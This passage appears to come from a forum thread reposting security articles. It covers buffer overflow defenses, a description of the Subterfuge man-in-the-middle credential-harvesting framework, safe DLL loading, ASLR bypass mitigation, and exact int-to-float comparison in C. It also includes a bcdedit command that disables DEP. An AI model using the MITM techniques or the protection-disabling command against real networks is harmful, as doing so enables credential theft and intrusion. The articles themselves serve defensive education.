The moment a user enters tom as the user name and ajay as the password via the command line arguments, this program validates those credentials and allows access as follows: Now try to enter some bogus data as credentials. As expected, the program won't allow us to get access as follows. At this moment, everything is running fine and under control. The character arrays uN and pass can each hold only 10 characters, including the terminating null. If we input data beyond this fixed length, it is still copied straight into the buffer by strcpy, because we are not performing any bounds checking. The program cannot handle the excess data, which leads to a buffer overflow as follows: Since we are testing this program under the Windows environment, the OS raises the aforesaid exception, which eventually causes the application to crash, because the program accepted data beyond the limit of 10. When this program is compiled with the Turbo compiler, the buffer overflow is reported in a different manner as follows: When the aforesaid code executes, it first pushes the two arguments (user name and password) of the creed() function onto the stack in reverse order.
It then calls the creed() function. The CALL instruction pushes the return address (the instruction pointer, EIP) onto the stack. The creed() function now pushes the stack frame pointer onto the stack. The current stack pointer (ESP) is then copied into EBP, making it the new frame pointer (SFP) as follows: Now, the address of the instruction that follows the call to creed(), 0x00412206, is saved on the stack, and execution jumps into the creed() code, where the user name and password values are copied into eax and pushed onto the stack. After both strcpy calls, the strcmp call is executed. Thereafter, the ret opcode is executed, which marks the end of the function and returns to the saved address. If a parameter is entered in the correct form, shorter than the fixed length, the program doesn't show any abnormal behavior. But when we pass an argument beyond the limit, we find that the EBP register holds the value 79797979 (0x79 is the ASCII code for 'y'), which becomes the ESP now as follows: As we move ahead, the execution should jump to 00412209 instead of 79797979. Hence, Visual Studio throws a run time exception at offset 79797979, where the program is denied read access to the address space at location 79797979. So, the program crashes because execution is halted by an access violation caused by the buffer overflow, as follows:

Protection Mechanisms

Buffer overrun attacks can be thwarted in the Windows environment by making critical configuration changes. The Visual Studio C++ compiler offers several options to enable certain checks at runtime, such as /GS, /RTC, the runtime library checks and DEP. These options can be enabled using specific compiler flags. The /GS option shields against vulnerable parameters passed into a function in the form of a pointer, string buffer, or C++ reference. Normally, incoming function parameters are placed on the stack and are susceptible to being overwritten, just like the return address.
To avoid this situation, the compiler makes a copy of the vulnerable incoming parameters after the storage for local buffers, where they are not in danger of being overwritten. The /RTC compiler option, on the other hand, controls run-time checks such as underflow and overflow checking, stack verification and detection of variable use without initialization. However, these run-time checks introduce a performance overhead that is not acceptable for release builds. We should enable at least these compiler checks: Buffer Security check (/GS); Runtime Library check (Both /RTC1…); Basic Runtime checks (Enable VC++ Run time Library).

DEP

Visual Studio also provides a Data Execution Prevention (DEP) option at build time, which applies as long as DEP is not disabled at the operating system level. Data Execution Prevention (DEP) is an important feature for protecting against buffer overflow attacks. This feature is available on Windows and assumes that no code is intended to be executed unless it is part of the program itself. It uses NX technology to prevent the execution of instructions stored in data segments. Changing its settings requires administrative rights. We can alter this configuration from the command prompt as follows:

To disable Data Execution Prevention:
    bcdedit.exe /set {current} nx AlwaysOff
To enable Data Execution Prevention:
    bcdedit.exe /set {current} nx AlwaysOn

We can also enable this setting from the My Computer advanced settings under Performance Options. These options are disabled by default. In order to enable them, log in with an Administrator account as follows: After enabling all the necessary configuration options for thwarting buffer overflow attacks, run the program and supply some bogus argument beyond the buffer limit. The operating system will issue a run time buffer overflow exception as follows: Even though /GS aborted the program, these overruns should be fixed.
Buffer overflow attacks can be avoided at coding time by ensuring that input data does not exceed the size of the fixed-length buffer in which it is stored. Here, the fixed-length buffer size is 10, so calculate the length of each input and make sure it is less than 10 before copying, as follows:

    #define BUFF_SIZE 10

    void creed(char *usr, char *password)
    {
        ..
        /* Both inputs are copied, so both lengths must be checked. */
        if (strlen(usr) < BUFF_SIZE && strlen(password) < BUFF_SIZE) {
            strcpy(uN, usr);
            strcpy(pass, password);
        } else {
            printf("\n Program doesn't support this input length \n");
            exit(1);
        }
        ...
    }

    int main(int argc, char* argv[])
    {
        ..
        creed(argv[1], argv[2]);
        return 0;
    }

Now a buffer overflow attack can be thwarted even if other protections such as /GS and DEP are not applied in the solution configuration. Here, the program alerts the user and exits if data is entered beyond the buffer limit as follows: As we have stated earlier, C and C++ sources are the most vulnerable to buffer overrun attacks. The following C library functions make a program vulnerable, so it is recommended to avoid using them in your source code.

[TABLE]
[TR] [TD]Functions[/TD] [TD]Potential Problem[/TD] [/TR]
[TR] [TD]strcpy(char *str, const char *str2)[/TD] [TD]str buffer could overflow[/TD] [/TR]
[TR] [TD]gets(char *arr)[/TD] [TD]arr buffer could overflow[/TD] [/TR]
[TR] [TD]getwd(char *arr)[/TD] [TD]arr buffer could overflow[/TD] [/TR]
[TR] [TD]scanf()[/TD] [TD]Arguments can overflow[/TD] [/TR]
[TR] [TD]fscanf()[/TD] [TD]Arguments can overflow[/TD] [/TR]
[TR] [TD]sprintf(char *str, const char *str2)[/TD] [TD]str buffer could overflow[/TD] [/TR]
[TR] [TD]strcat(char *str, const char *str2)[/TD] [TD]str buffer could overflow[/TD] [/TR]
[/TABLE]

Final Note

In this article, we discussed how buffer overflows are encountered, the varieties of overflows that can materialize, and ways to control the flow of execution to our arbitrary code. We have also covered various forms of prevention mechanisms that can be taken to thwart buffer overrun attacks.
Memory management and CPU registers have also been covered, giving us the elementary knowledge indispensable to detect and exploit buffer overflow vulnerability. We looked into actual exploits on how they were written and where the control on the flow of execution had taken place. Understanding all these sections will aid us in the future when it comes to analyses, debugging, and exploiting the buffer overflow vulnerability. By Ajay Yadav|April 23rd, 2014 Sursa: Buffer Overflow Attack & Defense - InfoSec Institute
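The integer overflow case listed in the article above (a size computation that wraps around before memory is allocated) can be sketched in C as follows. This is a minimal illustration under stated assumptions, not code from the article: `checked_mul` and `alloc_records` are hypothetical helper names, and the check simply refuses to allocate when `count * elem_size` would not fit in a `size_t`.

```c
#include <stdint.h>
#include <stdlib.h>

/* Stores count * elem_size in *out and returns 1 if the product fits in size_t.
   Returns 0, leaving *out untouched, if the multiplication would wrap around. */
int checked_mul(size_t count, size_t elem_size, size_t *out)
{
    if (elem_size != 0 && count > SIZE_MAX / elem_size)
        return 0;
    *out = count * elem_size;
    return 1;
}

/* Allocates room for `count` records of `elem_size` bytes each.
   Returns NULL instead of a too-small buffer when the total size would overflow. */
void *alloc_records(size_t count, size_t elem_size)
{
    size_t total;
    if (!checked_mul(count, elem_size, &total))
        return NULL;
    return malloc(total);
}
```

Without the check, a huge attacker-supplied `count` could wrap the product to a small number, so `malloc` would succeed with a short buffer and later writes of `count` records would run past its end. The standard `calloc(count, elem_size)` performs a comparable check internally and is often the simpler choice.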
  14. Subterfuge: The Automated Man-in-the-Middle Attack Framework Introduction Surfing the internet through untrustworthy public networks whether wired or wireless has been known to be risky for a long time now. We all think twice before logging into our bank account or accessing any kind of sensitive information, but what about simply browsing our favourite site? A Man in the Middle Attack (MITM) is a type of attack in which an attacker assumes the role of the default gateway and captures all the traffic going to and fro. A MITM attack allows the attacker to eavesdrop on the conversation between the parties, or to actively intervene in the conversation to achieve some illegitimate end. This is a very serious attack and also very easy to perform. In the image above you will notice that the attacker inserted him/herself in-between the flow of traffic between the client and server. Now that the attacker has intruded into the communication between the two endpoints, he/she can inject false information and intercept the data transferred between them. Subterfuge Subterfuge is a simple but devastatingly effective credential-harvesting program, which exploits vulnerabilities in the inherently trusting Address Resolution Protocol. Subterfuge provides the framework by which users can then leverage a MITM attack to do anything from browser/service exploitation to credential harvesting, thus equipping information and network security professionals and enthusiasts alike with a sleek “push-button” security validation tool. Subterfuge is developed with the Python programming language and uses a SQLite database. ARPSpoof from the Dsniff suite is used to poison the target network. Subterfuge also uses SSLStrip to collect user credentials that were sent over a secure socket layer (SSL) web connection. Why Subterfuge? Subterfuge has a sleek web-based interface to allow a user to deploy the software quickly and easily without editing sophisticated text-based configuration files. 
Subterfuge automates the configuration process, or, alternatively, streamlines it with a Graphical User Interface (GUI). It also allows the user to view a report of all the different credentials that were harvested. Subterfuge uses software like SSLStrip, Evilgrade and ARPSpoof. These are briefly introduced below. SSLStrip is a tool written by Moxie Marlinspike. It rewrites HTTPS links and redirects into plaintext HTTP, so that the victim talks to the attacker over HTTP while the attacker relays the requests to the originally intended HTTPS server on the internet. Credentials that the victim believes are protected by SSL can therefore be logged in plaintext. Evilgrade is a modular framework that allows us to take advantage of poor update implementations by injecting fake updates. It works with modules; each module implements the structure needed to emulate a false update of a specific application. ARPSpoof is a simple tool that allows a user to masquerade as the network gateway by flooding the network with forged ARP packets. This causes the attacker's MAC address to be associated with the IP address of the default gateway, thereby initiating a MITM connection.

Subterfuge Advantages over other MITM Tools

Intuitive interface; easy to use; silent and stealthy; open source.

Modules in Subterfuge

Subterfuge contains several modules. These help you to customise your attack vectors. Multiple modules can be run simultaneously. The modules in Subterfuge are as follows:

Network View: The Network View allows you to see everything happening on the network. It allows you to quickly and easily launch advanced attack vectors.
Credential Harvester: The User Credential Harvester is the default module for Subterfuge. It allows the user to transparently downgrade an HTTPS session and steal user login credentials. This runs automatically when you hit “Start”.
Module Builder: Module Builder allows you to create your own modules.
You can integrate your own attack code into the framework. Tunnel Block This module will block all attempts to avoid MITM Exploitation through encrypted tunnelling protocols like VPNs, SSH, and other encrypted protocols. SSLStrip is not included in this module, because SSLStrip automatically runs with Subterfuge. Tunnel Block will prevent the following protocols: PPTP, Cisco IPSec, L2TP, OpenVPN, SSH. Denial of Service This module disconnects a client from the network. HTTP Code Injection Subterfuge’s HTTP Code Injection Module allows a user to inject custom payloads directly into a target’s browsing session. Payloads can be anything from simple Javascript/HTML injections to browser exploits. Session Hijacking The session hijacking plug-in will allow a user to masquerade as a victim within the session that was hijacked. This attack occurs by stealing the cookie used to authenticate into a web service. Evilgrade update exploitation Evilgrade is a tool that allows a user to spoof an update server on the network. When a victim starts up a program it automatically looks to see if updates exist. Evilgrade steps into this process and sends the victim a malicious payload. Settings menu Subterfuge will attempt to auto-configure for your network. If it fails to configure the network automatically, you can go to the settings menu and manually configure it. The settings menu allows you to control and fine-tune different aspects of your attack, so if you’re a new user or seasoned vet you have control over Subterfuge. Conclusion Subterfuge is an Automated Man-in-the-Middle Attack Framework. Subterfuge Framework allows a user to circumvent many security protocols and policies on a computer network with ease and with devastating results to the victims. Subterfuge largely transforms the complexity of performing the Man in the Middle Attacks with the other existing tools and makes it far easier to launch various forms of MITMs. 
Subterfuge collects user information and credentials on the network to which they are connected. A Subterfuge user ought to be able to steal user credentials, without the victim’s knowledge, even when using a secure protocol such as HTTPS. References subterfuge - Automated Man-in-the-Middle Attack Framework - Google Project Hosting By Mohit Rawat|April 22nd, 2014 Sursa: Subterfuge: The Automated Man-in-the-Middle Attack Framework - InfoSec Institute
  15. Load Library Safely SRD Blog Author 13 May 2014 11:26 AM

Dynamically loading libraries in an application can lead to vulnerabilities if it is not secured properly. In this blog post we talk about loading a library using the LoadLibraryEx() API and making use of its options to do so safely.

Know the defaults:

The library file name passed to a LoadLibrary() / LoadLibraryEx() call need not contain an extension. If one is not specified, then the default library file extension, .DLL, is used. As a result of this feature, if a null is passed as the library name, it tries to load ".DLL", which could be exploited by placing a ".DLL" file in the path searched. The library file name passed to a LoadLibrary() / LoadLibraryEx() call need not specify a directory path. If one is specified, the library is loaded only from the specified path. Otherwise, the following default DLL search order is used: (1) the directory of the current process image file (the application directory); (2) the system directory; (3) the 16-bit system directory; (4) the Windows directory; (5) the current working directory; (6) the directories listed in the PATH environment variable. Windows maintains a list of known DLLs, basically a set of system DLLs, that are always guaranteed to load from the system directory when they are requested by name rather than by an absolute path. The DllMain() function within the loaded library is called after the library is loaded into memory.

Control the DLL search order:

There are various options to modify the order in which the library being loaded is searched for, other than the default search order, when no absolute path is provided.
Some of the APIs that can influence the DLL search order/path used by LoadLibraryEx() are as below:

SetDllDirectory(): Adds a directory to the search path used to locate DLLs for the application.
SetDefaultDllDirectories(): Specifies a default set of directories to search when the calling process loads a DLL.
AddDllDirectory(): Adds a directory to the process DLL search path.
RemoveDllDirectory(): Removes a directory that was added to the process DLL search path by using AddDllDirectory().
SearchPath(): Searches for a specified file in a specified path.
SetSearchPathMode(): Sets the per-process mode that the SearchPath() function uses when locating files.
SetCurrentDirectory(): Changes the current directory for the current process.
DefaultDllImportSearchPathsAttribute: For managed applications, use this attribute to specify the paths used to search for DLLs during platform invokes.

LoadLibraryEx() provides many flags that can be used to alter the default search order. The table below lists most of the flags and also depicts the DLL search order that is followed for each of them. Some of the options even consider the paths set with the above-mentioned APIs. Table 1: Depicting different options to the LoadLibraryEx and how it affects the DLL search order.

Loading library as non-executable:

It is not always required to load a library as an executable image. LoadLibraryEx() makes it possible to load a library as a data file, or an image resource, for example. For this purpose, it supports the following options: LOAD_LIBRARY_AS_DATAFILE, LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE, LOAD_LIBRARY_AS_IMAGE_RESOURCE, DONT_RESOLVE_DLL_REFERENCES. These options help in treating a file as a normal data file rather than as an executable module. Loading with these options doesn't call DllMain(), and none of the memory space of the loaded DLL data is marked as executable.

Blocking the library from loading:

Sometimes it might be required to block a library, or to block an illegitimate library, from loading into an application.
Check out the following facilities to aid that:

AppLocker: AppLocker is a policy-based mechanism to block DLLs from loading into applications. These policies can be pushed via group policy. AppLocker can control executables, scripts and installers. When a new DLL loads, a notification is sent to AppLocker to verify that the DLL is allowed to load. AppLocker calls the Application Identity component to calculate the file attributes. It duplicates the existing process token and replaces the Application Identity attributes in the duplicated token with the attributes of the loaded DLL. AppLocker then evaluates the policy for this DLL, and the duplicated token is discarded. Depending on the result of this check, the system either continues to load the DLL or stops the process. AppLocker can block the DLL based on path, publisher or file hash.
Code Signing: Microsoft Authenticode technology can be used to sign the DLL, that is, to attach digital signatures to the DLL to guarantee its authenticity and integrity.

To summarize our discussion, to ensure secure loading of libraries: use a proper DLL search order; always specify the fully qualified path when the library location is constant; load as a data file when required; make use of the code signing infrastructure or AppLocker.

Some common attack vectors we see:

Application directory attacks, especially from the temporary internet or download folder perspective. Particularly when the application is an installer, it is common for people to download the installer into the default download directory and execute it from there. An attacker who can drop a malicious file into that default directory can make use of the application directory to get the DLL loaded. Manifest and .local redirection can also be used in this scenario.
Loading a DLL from memory, and also PowerShell DLL injection, which can be used by malware to keep the loading of a malicious DLL from being detected.
TOCTOU attacks when loading a library from a remote location.
- Swamy Shivaganga Nagaraju, MSRC engineering team Sursa: Load Library Safely - Security Research & Defense - Site Home - TechNet Blogs
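The recommendations summarized in the post above (use a fully qualified path, restrict the search order, load as data when code execution is not needed) could look roughly like the C sketch below. It is only an illustration under assumptions: `is_fully_qualified`, `load_from_system32` and `load_as_data` are hypothetical helper names, the path check accepts only drive-letter paths and deliberately rejects UNC paths because the post flags remote loads as a TOCTOU risk, and the Windows calls are compiled only when `_WIN32` is defined. `LOAD_LIBRARY_SEARCH_SYSTEM32` needs a reasonably recent SDK and OS update level.

```c
#include <ctype.h>
#include <stddef.h>

#ifdef _WIN32
#include <windows.h>
#endif

/* Returns 1 if `path` looks like a fully qualified local Windows path such as
   "C:\dir\lib.dll" (drive letter, colon, separator), 0 otherwise.
   Relative names and UNC paths ("\\server\share\lib.dll") are rejected. */
int is_fully_qualified(const char *path)
{
    if (path == NULL || path[0] == '\0')
        return 0;
    if (isalpha((unsigned char)path[0]) && path[1] == ':' &&
        (path[2] == '\\' || path[2] == '/'))
        return 1;
    return 0;
}

#ifdef _WIN32
/* Loads a system DLL by bare name, searching only %windows%\system32,
   so the application directory and current directory are never consulted. */
HMODULE load_from_system32(const wchar_t *name)
{
    return LoadLibraryExW(name, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
}

/* Maps a file for resource access only; DllMain() is not called. */
HMODULE load_as_data(const wchar_t *full_path)
{
    return LoadLibraryExW(full_path, NULL,
                          LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE);
}
#endif
```

A caller would typically reject any configured DLL location for which `is_fully_qualified()` returns 0 before handing it to a loader function, and release the returned module with `FreeLibrary()` when done.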
  16. swiat 12 Mar 2014 9:13 AM

We have written several times in this blog about the importance of enabling the Address Space Layout Randomization (ASLR) mitigation in modern software, because it is a very important defense mechanism that can increase the cost of writing exploits for attackers and in some cases prevent reliable exploitation. In today’s blog, we’ll go through ASLR one more time to show in practice how valuable it can be in mitigating two real exploits seen in the wild, and to suggest solutions for programs not yet equipped with ASLR.

Born with ASLR

The ASLR mitigation adds a significant hurdle to exploit development, but we realized that sometimes a single module without ASLR loaded in a program can be enough to compromise all the benefits at once. For this reason, recent versions of the most popular Microsoft programs were natively developed to enforce ASLR automatically for every module loaded into the process space. In fact, Internet Explorer 10/11 and Microsoft Office 2013 are designed to run with the full benefits of this mitigation, and they enforce ASLR randomization natively without any additional setting on Win7 and above, even for those DLLs not originally compiled with the /DYNAMICBASE flag. So, customers using these programs already have good native protection, and they only need to take care of other programs, potentially targeted by exploits, that do not use ASLR.

ASLR effectiveness in action

Given the importance of ASLR, we are making additional efforts to close gaps when ASLR bypasses are presented at security conferences from time to time, or when they are found in the wild in targeted attacks. The outcome of this effort is to strengthen protection also for previous versions of Microsoft OS and browsers that cannot enforce ASLR natively as IE 10/11 and Office 2013 can. Some examples of recent updates designed to break well-known ASLR bypasses are shown in the following table.
[TABLE=width: 624] [TR] [TD=width: 96] MS BULLETIN [/TD] [TD=width: 192] ASLR BYPASS [/TD] [TD=width: 342] REFERENCE [/TD] [/TR] [TR] [TD=width: 96] MS13-063 [/TD] [TD=width: 192] LdrHotPatchRoutine [/TD] [TD=width: 342] Ref: http://cansecwest.com/slides/2013/DEP-ASLR%20bypass%20without%20ROP-JIT.pdf Reported in Pwn2Own 2013, works only for Win7 x64 [/TD] [/TR] [TR] [TD=width: 96] MS13-106 [/TD] [TD=width: 192] HXDS.DLL (Office 2007/2010) [/TD] [TD=width: 342] Ref: http://www.greyhathacker.net/?p=585 Seen used in-the-wild with IE/Flash exploits (CVE-2013-3893, CVE-2013-1347, CVE-2012-4969, CVE-2012-4792) [/TD] [/TR] [TR] [TD=width: 96] MS14-009 [/TD] [TD=width: 192] VSAVB7RT.DLL (.NET) [/TD] [TD=width: 342] Ref: http://www.greyhathacker.net/?p=585 Seen used in-the-wild with IE exploits (CVE-2013-3893) [/TD] [/TR] [/TABLE] We were glad to see the return of these recent ASLR updates in two recent attacks: the Flash exploit found in February (CVE-2014-0502) in some targeted attacks and a privately reported bug for IE8 (CVE-2014-0324) just patched today. As showed from the code snippets below, the two exploits would not have been effective against fully patched machines with MS13-106 update installed running Vista or above. [TABLE=width: 630] [TR] [TD=width: 362] [/TD] [TD=width: 261] Exploit code for CVE-2014-0502 (Flash) Unsuccessful attempt of ASLR bypass using HXDS.DLL fixed by MS13-106. NOTE: the code attempts also a second ASLR bypass based on Java 1.6.x [/TD] [/TR] [TR] [TD=width: 362] [/TD] [TD=width: 261] Exploit code for CVE-2014-0324 (IE8) Unsuccessful attempt of ASLR bypass using HXDS.DLL fixed by MS13-106. [/TD] [/TR] [/TABLE] Solutions for non-ASLR modules The two exploit codes above shows another important lesson: even if Microsoft libraries are compiled natively with ASLR and even if we work hard to fix known ASLR gaps for our products, there are still opportunities for attackers in using third-party DLLs to tamper the ASLR ecosystem. 
The example of Java 1.6.x is a well-known case: due to the popularity of this software suite and due to the fact that it loads an old non-ASLR library into the browser (MSVCR71.DLL), it became a very popular vector used in exploits to bypass ASLR. In fact, security researchers are frequently scanning for popular 3rd party libraries not compiled with /DYNAMICBASE that can allow a bypass; the following list is just an example of few common ones. [TABLE=width: 525] [TR] [TD=width: 252] 3rd PARTY ASLR BYPASS [/TD] [TD=width: 378] REFERENCE [/TD] [/TR] [TR] [TD=width: 252] Java 1.6.x (MSVCR71.DLL) [/TD] [TD=width: 378] Very common ASLR bypass used in-the-wild for multiple CVEs NOTE: Java 1.7.x uses MSVCR100.DLL which supports ASLR [/TD] [/TR] [TR] [TD=width: 252] DivX Player 10.0.2 Yahoo Messenger 11.5.0.228 AOL Instant Messenger 7.5.14.8 [/TD] [TD=width: 378] Ref: http://www.greyhathacker.net/?p=756 (not seen in real attacks) [/TD] [/TR] [TR] [TD=width: 252] DropBox [/TD] [TD=width: 378] Ref:http://codeinsecurity.wordpress.com/2013/09/09/installing-dropbox-prepare-to-lose-aslr/ (not seen in real attacks) [/TD] [/TR] [TR] [TD=width: 252] veraport20.Veraport20Ctl Gomtvx.Launcher INIUPDATER.INIUpdaterCtrl [/TD] [TD=width: 378] Ref: KISA report http://boho.or.kr/upload/file/EpF448.pdf (seen in-the-wild with CVE-2013-3893) [/TD] [/TR] [/TABLE] As noted at beginning of this blog, Internet Explorer 10/11 and Office 2013 are not affected by ASLR bypasses introduced by 3rd party modules and plugins. 
Instead, customers still running older versions of Internet Explorer and Office can take advantage of two effective tools that enforce the ASLR mitigation for any module:
- EMET (Enhanced Mitigation Experience Toolkit): can be used to enable system-wide ASLR, or “MandatoryASLR” selectively on any process;
- “Force ASLR” update KB2639308: makes it possible for selected applications to forcibly relocate images not built with /DYNAMICBASE, using Image File Execution Options (IFEO) registry keys.
Conclusions
ASLR bypasses do not represent vulnerabilities by themselves, since they have to be combined with a real memory corruption vulnerability before attackers can build an exploit. It is nevertheless nice to see that closing ASLR bypasses can reduce the reliability of certain targeted attacks. We encourage all customers to proactively test and deploy the suggested tools when possible, especially for old programs commonly targeted by memory corruption exploits. We expect that attackers will continue to increase their focus and research on more sophisticated ASLR bypasses which rely on disclosure of memory addresses rather than on non-ASLR libraries.
- Elia Florio, MSRC Engineering
Sursa: When ASLR makes the difference - Security Research & Defense - Site Home - TechNet Blogs
  17. [h=2]The perfect int == float comparison[/h]Just to be clear, this post is not going to be about the float vs. float comparison. Instead, it will be about trying to compare a floating point value with an integer value in an accurate, precise way. It will also be about why just doing int_value == float_value in some languages (C, C++, PHP, and some others) doesn't give you the result you would expect - a problem which I recently stumbled on when trying to fix a certain library I was using.
UPDATE: Just to make sure we see it in the same way: this post is about playing with bits and floats just for the sake of playing with bits and floats; it's not something you could or should use in anything serious though.
UPDATE 2: There were two undefined behaviours pointed out in my code (one, two) - these are now fixed.
The problem explained
Let's start by demonstrating the problem by running the following code, which compares consecutive integers with a floating point value:
float a = 100000000.0f;
printf("...99 --> %i\n", a == 99999999);
printf("...00 --> %i\n", a == 100000000);
printf("...01 --> %i\n", a == 100000001);
printf("...02 --> %i\n", a == 100000002);
printf("...03 --> %i\n", a == 100000003);
printf("...04 --> %i\n", a == 100000004);
printf("...05 --> %i\n", a == 100000005);
The result:
...99 --> 1
...00 --> 1
...01 --> 1
...02 --> 1
...03 --> 1
...04 --> 1
...05 --> 0
Sadly this was to be expected in the floating point realm. However, while in this world both 99999999 and 100000004 might be equal to 100000000, this is sooo not true for common sense or standard arithmetic.
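The effect shown above can be checked in isolation with a minimal sketch. It assumes a 32-bit int, an IEEE 754 32-bit float and a 64-bit double; the function name is made up for this illustration and is not part of the original post.

```c
#include <stdbool.h>

/* Hypothetical helper: returns true when storing i in a 32-bit float
 * changes its value. Assumes int is 32 bits, so that double (with its
 * 53-bit significand) can hold every int exactly. */
bool int_changes_when_stored_as_float(int i) {
    /* volatile forces a real 32-bit store, so extra FPU precision
     * cannot hide the rounding */
    volatile float stored = (float)i;
    return (double)stored != (double)i;
}
```

Called with 100000000 it reports no change, while 100000001 does change, which is why the `==` comparisons above come out "equal".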
Let's look at another example - an attempt to sort a collection of numbers by value in PHP:
<?php
$x = array(
    20000000000000002,
    20000000000000003,
    20000000000000000.0,
);
sort($x);
foreach ($x as $i) {
    if (is_float($i)) {
        printf("%.0f\n", $i);
    } else {
        printf("%i\n", $i);
    }
}
The "sorted" result (64-bit PHP):
> php test.php
20000000000000002
20000000000000000
20000000000000003
Side note: The code above must be executed using 64-bit PHP. The 32-bit PHP has integers limited to 32 bits, so the numbers I used in the example would exceed their limit and would get silently converted to doubles. This results in the following output:
20000000000000000
20000000000000000
20000000000000004
So, what's going on? It all boils down to floats having too little precision for larger integers (this is a good time to look at this and this). For example, the 32-bit float has only 23 bits dedicated to the significand - this means that if an integer value that is getting converted to float needs more than 24 bits (sic!; keep in mind that in floats there is a hardcoded "1" at the top position, which is not present in the bit-level representation) to be represented, it will lose its least significant bits - i.e. on typical IEEE 754 platforms the value is rounded to the nearest float, whose low bits are all zeroes. In the C-code case above the decimal value 100000001 actually requires 27 bits to be properly represented:
0b101111101011110000100000001
However, since only the leading "1" and the following 23 bits will fit inside a float, the "1" at the very end is lost. Therefore, this number actually becomes another number:
0b101111101011110000100000000
Which in decimal is 100000000 and therefore is equal to the float constant of 100000000.0f. The same problem exists between 64-bit integers and 64-bit doubles - the latter have only 52 bits dedicated to storing the value (53 counting the implicit leading "1").
A somewhat amusing side note
Actually, it gets even better.
Let's re-write the first code shown above (the C one) to use a loop: float a = 100000000.0f; int i; for(i = 100000000 - 5; i <= 100000000 + 5; i++) { printf("%11.1f == %9u --> %i\n", a, i, a == i); } As you can see, there are no big changes. Now let's compile it and run it: >gcc test.c > a 100000000.0 == 99999995 --> 0 100000000.0 == 99999996 --> 0 100000000.0 == 99999997 --> 0 100000000.0 == 99999998 --> 0 100000000.0 == 99999999 --> 0 100000000.0 == 100000000 --> 1 100000000.0 == 100000001 --> 0 100000000.0 == 100000002 --> 0 100000000.0 == 100000003 --> 0 100000000.0 == 100000004 --> 0 100000000.0 == 100000005 --> 0 The result is magically correct! How about we compile it with optimization then? >gcc test.c -O3 > a 100000000.0 == 99999995 --> 0 100000000.0 == 99999996 --> 1 100000000.0 == 99999997 --> 1 100000000.0 == 99999998 --> 1 100000000.0 == 99999999 --> 1 100000000.0 == 100000000 --> 1 100000000.0 == 100000001 --> 1 100000000.0 == 100000002 --> 1 100000000.0 == 100000003 --> 1 100000000.0 == 100000004 --> 1 100000000.0 == 100000005 --> 0 Why is that? Well, in both cases the compiler needs to convert the integer to a float and then compare it with the second float value. This however can be done in two different ways: Option 1: The integer is converted to a floating point value, then is stored in memory as a 32-bit float and then loaded into the FPU for the comparison OR (in case of constants) the integer constant can be converted to a 32-bit float constant at compilation time and then it will be loaded into the FPU for comparison at runtime. Option 2: The integer is directly loaded into the FPU for comparison (using fild FPU instruction or similar). 
The difference here is related to the FPU internally operating on larger floating point values with more precision (by default it's 80 bits, though you can change this) - so the 32-bit integer isn't rounded on load, as it would be if it got converted explicitly to a 32-bit float (which, again, has only 24 bits for the actual value). Which option is selected depends strictly on the compiler - its mood, version, options used at compilation, etc.
The perfect comparison
Of course, it's possible to do a perfect comparison. The simplest and most straightforward way is to cast both the int value and the float value to a double before comparing them - double has a large enough significand to store all possible 32-bit int values. And for 64-bit integers you can use the 80-bit long double (where the compiler provides it), which has exactly 64 bits dedicated to storing the value (in this format the leading "1" is stored explicitly). But that's too easy. Let's try to do the actual comparison without converting to larger types. This can be done in two ways: the "mathematical" way (or: value-specific way) and the encoding-specific way. Both are presented below.
UPDATE 3: Actually there seems to be another way, as pointed out in the comments below and in this reddit post. It does make sense, but I still wonder if there is any counterexample (please note that I'm not saying there is; I'm just saying it never hurts to look for one ;>).
The mathematical way
We basically do it the other way around - i.e. we try to convert the float to an integer. There are a couple of problems here which we need to deal with:
1. The float value might be bigger than INT_MAX or smaller than INT_MIN. In such a case the conversion is undefined behaviour in C and we wouldn't be able to catch it after the conversion, so we need to deal with it sooner.
2. The float value might have a non-zero fractional part. This would get truncated when converted to an int (e.g. (int)1.1f is equal to 1) - we don't want this to happen either.
The implementation of this method (with some comments) is presented below:
bool IntFloatCompare(int i, float f) {
  // Simple case.
  if ((float)i != f)
    return false;

  // Note: The constant used here CAN be represented as a float. Normally
  //       you would want to use INT_MAX here instead, but that value
  //       *cannot* be represented as a float.
  const float TooBigForInt = (float)0x80000000u;
  if (f >= TooBigForInt) {
    return false;
  }
  if (f < -TooBigForInt) {
    return false;
  }

  float ft = truncf(f);
  if (ft != f) {
    // Not an integer.
    return false;
  }

  // It should be safe to cast float to integer now.
  int fi = (int)f;
  return fi == i;
}
The encoding-specific way
This method relies on decoding the float value from the bit-level representation, checking if it's an integer, checking if it is in range and finally comparing the bits with the integer value. I'll just leave you with the code. If in doubt - refer to this wikipedia page.
bool IntFloatCompareBinary(int i, float f) {
  uint32_t fu32;
  memcpy(&fu32, &f, 4);

  uint32_t sign = fu32 >> 31;
  uint32_t exp = (fu32 >> 23) & 0xff;
  uint32_t frac = fu32 & 0x7fffff;

  // NaN? Inf?
  if (exp == 0xff) {
    return false;
  }

  // Subnormal representation?
  if (exp == 0) {
    // Check if fraction is 0. If so, it's true if "i" is 0 as well.
    // Otherwise it's false in all cases.
    return (frac == 0 && i == 0);
  }

  int exp_decoded = (int)exp - 127;

  // If exponent is negative, the number has a fraction part, which means it's not equal.
  if (exp_decoded < 0) {
    return false;
  }

  // If exponent is above 31, int cannot represent such big numbers.
  if (exp_decoded > 31) {
    return false;
  }

  // There is one case where exp_decoded equal to 31 makes sense - when float is
  // equal to INT_MIN, i.e. sign is - and fraction part is 0.
  if (exp_decoded == 31 && (sign != 1 || frac != 0)) {
    return false;
  }

  // What is left is in range of integer, but still can have a fraction part.
  // Check if any fraction part will be left.
  uint32_t value_frac = (frac << exp_decoded) & 0x7fffff;
  if (value_frac != 0) {
    return false;
  }

  // Check the value. Unsigned arithmetic is used here so that the INT_MIN
  // case (a shift into bit 31 followed by a negation) does not overflow a
  // signed int.
  uint32_t value = (1u << 23) | frac;
  int shift_diff = exp_decoded - 23;
  if (shift_diff < 0) {
    value >>= -shift_diff;
  } else {
    value <<= shift_diff;
  }

  if (sign) {
    value = 0u - value;
  }

  return (uint32_t)i == value;
}
Summary
The above functions can be used for a perfect comparison and they SeemToWork™ (at least on little endian x86). With some more work both functions could be converted to be perfect "less than" comparators, which then could be used to fix the PHP sorting example. But... seriously, just cast the integer and float to something that has more precision ;>
P.S. Did you know that there are exactly 75'497'471 positive integer values that can be precisely represented as a float? Not a lot for the total of 2'147'483'647 positive integers.
Sursa: gynvael.coldwind//vx.log
